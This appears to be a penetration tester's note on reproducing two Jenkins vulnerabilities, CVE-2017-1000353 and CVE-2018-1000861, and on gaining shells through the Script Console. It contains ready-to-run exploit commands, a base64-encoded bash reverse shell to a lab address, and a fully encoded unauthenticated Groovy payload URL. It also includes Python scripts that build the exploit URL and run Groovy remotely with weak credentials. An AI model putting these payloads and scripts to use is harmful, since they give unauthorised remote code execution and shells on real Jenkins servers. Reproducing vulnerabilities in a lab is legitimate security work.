Jenkins
1. Vulnerability reproduction
CVE-2017-1000353
Affected versions: Jenkins 2.56 and earlier, Jenkins LTS 2.46.1 and earlier (unauthenticated Java deserialization through the remoting-based CLI; the original note listed "all main-line and LTS versions", which is too broad)
https://github.com/vulhub/CVE-2017-1000353/releases/download/1.1/CVE-2017-1000353-1.1-SNAPSHOT-all.jar
https://github.com/vulhub/CVE-2017-1000353
Place CVE-2017-1000353-1.1-SNAPSHOT-all.jar in the CVE-2017-1000353-master directory (the checkout of the second link above).
Start an nc listener first on the port embedded in the payload (7777 below), then generate the serialized payload and deliver it to get the reverse shell. These are two separate commands:
java -jar CVE-2017-1000353-1.1-SNAPSHOT-all.jar jenkins_poc.ser "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEzNS4xMzEvNzc3NyAwPiYx}|{base64,-d}|{bash,-i}"
python exploit.py http://192.168.135.131:8080/ jenkins_poc.ser
The base64 string decodes to bash -i >& /dev/tcp/192.168.135.131/7777 0>&1; replace the address and port with your own listener. The {echo,...} brace form keeps the piped stage free of spaces, because the command string is split on whitespace into separate arguments when it is executed on the target.
CVE-2018-1000861
Affected versions: Jenkins 2.153 and earlier, Jenkins LTS 2.138.3 and earlier
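Added example (Python; not part of the original notes): decide from a target's X-Jenkins response header which of the two issues above applies, using the affected ranges quoted in these notes. Jenkins sets that header on its responses, including the 403 login wall; the target URL is a placeholder.

```python
import re
import sys
from typing import List, Optional, Tuple
from urllib.error import HTTPError
from urllib.request import Request, urlopen

# Upper bounds from the ranges quoted in these notes. Weekly ("main line") and
# LTS are separate release trains, so each issue keeps one bound per train.
AFFECTED = {
    "CVE-2017-1000353": {"weekly": (2, 56), "lts": (2, 46, 1)},
    "CVE-2018-1000861": {"weekly": (2, 153), "lts": (2, 138, 3)},
}


def parse_version(header: Optional[str]) -> Optional[Tuple[int, ...]]:
    """Parse an X-Jenkins value such as '2.138.3' into an int tuple (None if unparseable)."""
    m = re.fullmatch(r"\s*(\d+(?:\.\d+)*)\s*", header or "")
    return tuple(int(p) for p in m.group(1).split(".")) if m else None


def train(version: Tuple[int, ...]) -> str:
    """LTS versions carry three components (2.138.3); weekly releases carry two (2.153)."""
    return "lts" if len(version) >= 3 else "weekly"


def vulnerable_to(header: Optional[str]) -> List[str]:
    """CVEs from AFFECTED whose range for the matching train includes the advertised version."""
    v = parse_version(header)
    if v is None:
        return []
    t = train(v)
    return [cve for cve, bounds in AFFECTED.items() if v <= bounds[t]]


def fetch_jenkins_header(base_url: str) -> Optional[str]:
    """Read X-Jenkins from the target; a 4xx response still carries the header."""
    req = Request(base_url, method="HEAD")
    try:
        with urlopen(req, timeout=10) as resp:
            return resp.headers.get("X-Jenkins")
    except HTTPError as err:
        return err.headers.get("X-Jenkins")


if __name__ == "__main__":
    # Placeholder target: the lab address used in these notes.
    target = sys.argv[1] if len(sys.argv) > 1 else "http://192.168.135.131:8080/"
    hdr = fetch_jenkins_header(target)
    print(f"X-Jenkins: {hdr!r} -> {vulnerable_to(hdr) or 'none of the listed CVEs'}")
```

A reverse proxy in front of Jenkins may strip the header, so an empty result means "unknown", not "patched"; the version is also visible in the footer of the login page.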
Fully URL-encode the value parameter (every character, as in the request below). Before encoding it is:
value=public class x{public x(){"bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEzNS4xMzEvNzc3NyAwPiYx}|{base64,-d}|{bash,-i}".execute()}}
Start the nc listener first, then send the following GET request (no authentication needed) to get the reverse shell:
/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.scriptsecurity.sandbox.groovy.SecureGroovyScript/checkScript?sandbox=true&value=%70%75%62%6c%69%63%20%63%6c%61%73%73%20%78%7b%70%75%62%6c%69%63%20%78%28%29%7b%22%62%61%73%68%20%2d%63%20%7b%65%63%68%6f%2c%59%6d%46%7a%61%43%41%74%61%53%41%2b%4a%69%41%76%5a%47%56%32%4c%33%52%6a%63%43%38%78%4f%54%49%75%4d%54%59%34%4c%6a%45%7a%4e%53%34%78%4d%7a%45%76%4e%7a%63%33%4e%79%41%77%50%69%59%78%7d%7c%7b%62%61%73%65%36%34%2c%2d%64%7d%7c%7b%62%61%73%68%2c%2d%69%7d%22%2e%65%78%65%63%75%74%65%28%29%7d%7d
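Added example (Python; not part of the original notes): assemble the request above from its parts so the listener address can be changed without re-encoding the value by hand. It reproduces the notes' encoding of every character (lowercase hex) and checks that the encoded value decodes back to the Groovy payload; the base URL and listener address are placeholders.

```python
import base64
from urllib.parse import unquote

# Path from the request in these notes (the Script Security plugin's checkScript endpoint).
CHECK_SCRIPT_PATH = (
    "/securityRealm/user/admin/descriptorByName/"
    "org.jenkinsci.plugins.scriptsecurity.sandbox.groovy.SecureGroovyScript/checkScript"
)


def reverse_shell_b64(host: str, port: int) -> str:
    """Base64 of the bash reverse shell used throughout these notes."""
    return base64.b64encode(f"bash -i >& /dev/tcp/{host}/{port} 0>&1".encode()).decode()


def bash_command(host: str, port: int) -> str:
    # Groovy's String.execute() splits the command on whitespace, so the piped
    # stage is written with brace expansion ({echo,X} -> "echo X") and no spaces;
    # it then reaches bash -c as one argument.
    b64 = reverse_shell_b64(host, port)
    return f"bash -c {{echo,{b64}}}|{{base64,-d}}|{{bash,-i}}"


def groovy_payload(command: str) -> str:
    """The class-with-constructor payload shape used in these notes."""
    return f'public class x{{public x(){{"{command}".execute()}}}}'


def percent_encode_all(s: str) -> str:
    """Percent-encode every byte, letters included, the way the notes do."""
    return "".join(f"%{b:02x}" for b in s.encode("utf-8"))


def decode_value(encoded: str) -> str:
    """Inverse of percent_encode_all, for checking the encoded value."""
    return unquote(encoded)


def build_url(base_url: str, host: str, port: int) -> str:
    value = percent_encode_all(groovy_payload(bash_command(host, port)))
    return f"{base_url.rstrip('/')}{CHECK_SCRIPT_PATH}?sandbox=true&value={value}"


if __name__ == "__main__":
    # Placeholder addresses: the lab Jenkins and listener from these notes.
    print(build_url("http://192.168.135.131:8080/", "192.168.135.131", 7777))
```

Encoding every character is not required by the server; encoding only the reserved characters works too, but the all-encoded form avoids any ambiguity with `&`, `+`, `{` and `"` in the query string.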
Getting a shell through anonymous access or a weak password
If the instance allows anonymous access, or an account with a weak password can be found, log in to the management console (path: /manage).
Then open the Script Console at /script and run Groovy there, for example: println "whoami".execute().text
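Added example (Python; not part of the original notes): drive the Script Console over HTTP once valid credentials are known, so the `whoami` check above can be run from a script instead of the browser. It uses Jenkins' plain-text `/scriptText` endpoint (the same form field as `/script`, without the HTML page around the output) and fetches a CSRF crumb first, because a POST without one is rejected when CSRF protection is on. The URL and credentials are placeholders.

```python
import base64
import json
import sys
from typing import Dict
from urllib.error import HTTPError
from urllib.parse import urlencode
from urllib.request import Request, urlopen


def basic_auth_header(user: str, password: str) -> Dict[str, str]:
    """HTTP Basic header; Jenkins also accepts an API token in place of the password."""
    token = base64.b64encode(f"{user}:{password}".encode()).decode()
    return {"Authorization": f"Basic {token}"}


def parse_crumb(body: bytes) -> Dict[str, str]:
    """Turn the /crumbIssuer/api/json document into the header Jenkins expects on POSTs."""
    data = json.loads(body)
    return {data["crumbRequestField"]: data["crumb"]}


def script_form(groovy: str) -> bytes:
    """Body for /script and /scriptText: the Groovy source in a field named 'script'."""
    return urlencode({"script": groovy}).encode()


def run_groovy(base_url: str, user: str, password: str, groovy: str) -> str:
    base = base_url.rstrip("/")
    headers = basic_auth_header(user, password)
    # A 404 from the crumb issuer means CSRF protection is disabled; anything
    # else that fails here (401/403) is a credentials problem and is raised.
    try:
        with urlopen(Request(f"{base}/crumbIssuer/api/json", headers=headers), timeout=10) as resp:
            headers.update(parse_crumb(resp.read()))
    except HTTPError as err:
        if err.code != 404:
            raise
    req = Request(f"{base}/scriptText", data=script_form(groovy), headers=headers)
    with urlopen(req, timeout=30) as resp:
        return resp.read().decode(errors="replace")


if __name__ == "__main__":
    # Placeholder target and credentials (the weak-password case from these notes).
    url = sys.argv[1] if len(sys.argv) > 1 else "http://192.168.135.131:8080/"
    print(run_groovy(url, "admin", "admin", 'println "whoami".execute().text'))
```

The output is whatever the script printed on the controller, so the user shown by `whoami` is the account the Jenkins service runs as, which is what a subsequent reverse shell would inherit.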